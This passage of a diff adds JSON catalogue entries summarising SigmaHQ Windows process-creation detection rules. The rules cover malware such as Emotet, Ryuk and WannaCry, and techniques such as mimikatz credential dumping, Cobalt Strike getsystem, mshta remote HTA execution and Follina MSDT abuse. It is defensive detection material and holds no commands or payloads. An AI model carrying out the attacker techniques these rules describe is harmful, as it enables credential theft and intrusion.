"https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2021/08/09", + "filename": "proc_creation_win_malware_conti_shadowcopy.yml", + "author": "Max Altgelt, Tobias Michalski", + "level": "high", + "falsepositive": [ + "Some rare backup scenarios" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects typical Dridex process patterns", + "uuid": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "value": "Dridex Process Pattern", + "meta": { + "refs": [ + "https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dridex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" + ], + "creation_date": "2019/01/10", + "filename": "proc_creation_win_malware_dridex.yml", + "author": "Florian Roth, oscd.community", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process parameters as seen in DTRACK infections", + "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "value": "DTRACK Process Creation", + "meta": { + "refs": [ + "https://securelist.com/my-name-is-dtrack/93338/", + "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", + "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2019/10/30", + "filename": "proc_creation_win_malware_dtrack.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", + "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "value": "Emotet Process Creation", + "meta": { + "refs": [ + "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", + "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", + "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", + "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2019/09/30", + "filename": "proc_creation_win_malware_emotet.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "value": "Formbook Process Creation", + "meta": { + "refs": [ + "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", + "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", + "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", + "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], + "creation_date": "2019/09/30", + "filename": "proc_creation_win_malware_formbook.yml", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", + "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1", + "value": "NotPetya Ransomware Activity", + "meta": { + "refs": [ + "https://securelist.com/schroedingers-petya/78870/", + "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.t1070.001", + "attack.credential_access", + "attack.t1003.001", + "car.2016-04-002" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_malware_notpetya.yml", + "author": "Florian Roth, Tom Ueltschi", + "level": "critical", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects QBot like process executions", + "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "value": "QBot Process Creation", + "meta": { + "refs": [ + "https://twitter.com/killamjr/status/1179034907932315648", + "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "creation_date": "2019/10/01", + "filename": "proc_creation_win_malware_qbot.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Ryuk ransomware activity", + "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844", + "value": "Ryuk Ransomware", + "meta": { + "refs": [ + "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/12/16", + "filename": "proc_creation_win_malware_ryuk.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects wscript/cscript executions of scripts located in user directories", + "uuid": "cea72823-df4d-4567-950c-0b579eaf0846", + "value": "WScript or CScript Dropper", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_malware_script_dropper.yml", + "author": "Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community", + "level": "high", + "falsepositive": [ + "Winzip", + "Other self-extractors" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.", + "uuid": "410ad193-a728-4107-bc79-4419789fcbf8", + "value": "Trickbot Malware Recon Activity", + "meta": { + "refs": [ + "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ], + "creation_date": "2019/12/28", + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml", + "author": "David Burkett, Florian Roth", + "level": "critical", + "falsepositive": [ + "Rare System Admin Activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe", + "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "value": "Trickbot Malware Activity", + "meta": { + "refs": [ + "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559" + ], + "creation_date": "2020/11/26", + "filename": "proc_creation_win_malware_trickbot_wermgr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WannaCry ransomware activity", + "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079", + "value": "WannaCry Ransomware", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_malware_wannacry.yml", + "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "value": "Adwind RAT / JRAT", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2017/11/10", + "filename": "proc_creation_win_mal_adwind.yml", + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to detect system changes made by Blue Mockingbird", + "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "value": "Blue Mockingbird", + "meta": { + "refs": [ + "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_blue_mockingbird.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112", + "attack.t1047" + ], + "creation_date": "2020/05/14", + "filename": "proc_creation_win_mal_blue_mockingbird.yml", + "author": "Trent Liffick (@tliffick)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects DarkSide Ransomware and helpers", + "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "value": "DarkSide Ransomware Pattern", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", + "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ], + "creation_date": "2021/05/14", + "filename": "proc_creation_win_mal_darkside_ransomware.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown", + "UAC bypass method used by other malware" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f", + "value": "Hermetic Wiper TG Process Patterns", + "meta": { + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" + ], + "creation_date": "2022/02/25", + "filename": "proc_creation_win_mal_hermetic_wiper_activity.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects LockerGoga Ransomware command line.", + "uuid": "74db3488-fd28-480a-95aa-b7af626de068", + "value": "LockerGoga Ransomware", + "meta": { + "refs": [ + "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", + "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", + "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ], + "creation_date": "2020/10/18", + "filename": "proc_creation_win_mal_lockergoga_ransomware.yml", + "author": "Vasiliy Burov, oscd.community", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Ryuk Ransomware command lines", + "uuid": "0acaad27-9f02-4136-a243-c357202edd74", + "value": "Ryuk Ransomware Command Line Activity", + "meta": { + "refs": [ + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_ryuk.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ], + "creation_date": "2019/08/06", + "filename": "proc_creation_win_mal_ryuk.yml", + "author": "Vasiliy Burov", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script", + "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", + "value": "Suspicious Usage of the Manage-bde.wsf Script", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", + "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", + "https://twitter.com/bohops/status/980659399495741441", + "https://twitter.com/JohnLaTwC/status/1223292479270600706", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_manage_bde_lolbas.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "uuid": "15619216-e993-4721-b590-4c520615a67d", + "value": "Meterpreter or Cobalt Strike Getsystem Service Start", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "level": "high", + "falsepositive": [ + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detection well-known mimikatz command line arguments", + "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "value": "Mimikatz Command Line", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_mimikatz_command_line.yml", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "level": "medium", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "value": "MMC20 Lateral Movement", + "meta": { + "refs": [ + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml" + ], + "tags": [ + "attack.execution", + "attack.t1021.003" + ], + "creation_date": "2020/03/04", + "filename": "proc_creation_win_mmc20_lateral_movement.yml", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Windows command line executable started from MMC", + "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "value": "MMC Spawning Windows Shell", + "meta": { + "refs": [ + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_spawn_shell.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.003" + ], + "creation_date": "2019/08/05", + "filename": "proc_creation_win_mmc_spawn_shell.yml", + "author": "Karneades, Swisscom CSIRT", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", + "value": "Modify Group Policy Settings", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modify_group_policy_settings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_modify_group_policy_settings.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of an existing service on a compromised host in order to execute an arbitrary payload when the service is started or killed as a method of persistence.", + "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df", + "value": "Modification Of Existing Services For Persistence", + "meta": { + "refs": [ + "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" + ], + "creation_date": "2020/09/29", + "filename": "proc_creation_win_modif_of_services_for_via_commandline.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "value": "Monitoring For Persistence Via BITS", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", + "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1197" + ], + "creation_date": "2020/10/29", + "filename": "proc_creation_win_monitoring_for_persistence_via_bits.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "value": "Mouse Lock Credential Gathering", + "meta": { + "refs": [ + "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", + "https://sourceforge.net/projects/mouselock/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml" + ], + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ], + "creation_date": "2020/08/13", + "filename": "proc_creation_win_mouse_lock.yml", + "author": "Cian Heasley", + "level": "medium", + "falsepositive": [ + "Legitimate uses of Mouse Lock software" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects file execution using the msdeploy.exe lolbin", + "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", + "value": "Execute Files with Msdeploy.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", + "https://twitter.com/pabraeken/status/995837734379032576", + "https://twitter.com/pabraeken/status/999090532839313408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2020/10/18", + "filename": "proc_creation_win_msdeploy.yml", + "author": "Beyu Denis, oscd.community", + "level": "medium", + "falsepositive": [ + "System administrator Usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "value": "Execute Arbitrary Commands Using MSDT.EXE", + "meta": { + "refs": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/_JohnHammond/status/1531672601067675648", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/05/29", + "filename": "proc_creation_win_msdt.yml", + "author": "Nasreddine Bencherchali (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in CVE-2022-30190", + "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", + "value": "Execute MSDT.EXE Using Diagcab File", + "meta": { + "refs": [ + "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/06/09", + "filename": "proc_creation_win_msdt_diagcab.yml", + "author": "GossiTheDog (rule), frack113 (sigma version)", + "level": "high", + "falsepositive": [ + "Legitimate usage of \".diagcab\" files" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "value": "MSDT.EXE Execution With Suspicious Cab Option", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1537896324837781506", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/06/21", + "filename": "proc_creation_win_msdt_susp_cab_options.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of \".diagcab\" files" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", + "value": "MSDT Executed with Suspicious Parent", + "meta": { + "refs": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" + ], + "creation_date": "2022/06/01", + "filename": "proc_creation_win_msdt_susp_parent.yml", + "author": "Nextron Systems", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", + "value": "Suspicious Minimized MSEdge Start", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_msedge_minimized_download.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", + "value": "Mshta Remotely Hosted HTA File Execution", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.005" + ], + "creation_date": "2022/08/08", + "filename": "proc_creation_win_mshta_http.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies suspicious mshta.exe commands.", + "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", + "value": "Mshta JavaScript Execution", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_mshta_javascript.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Windows command line executable started from MSHTA", + "uuid": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "value": "MSHTA Spawning Windows Shell", + "meta": { + "refs": [ + "https://www.trustedsec.com/july-2015/malicious-htas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_spawn_shell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005", + 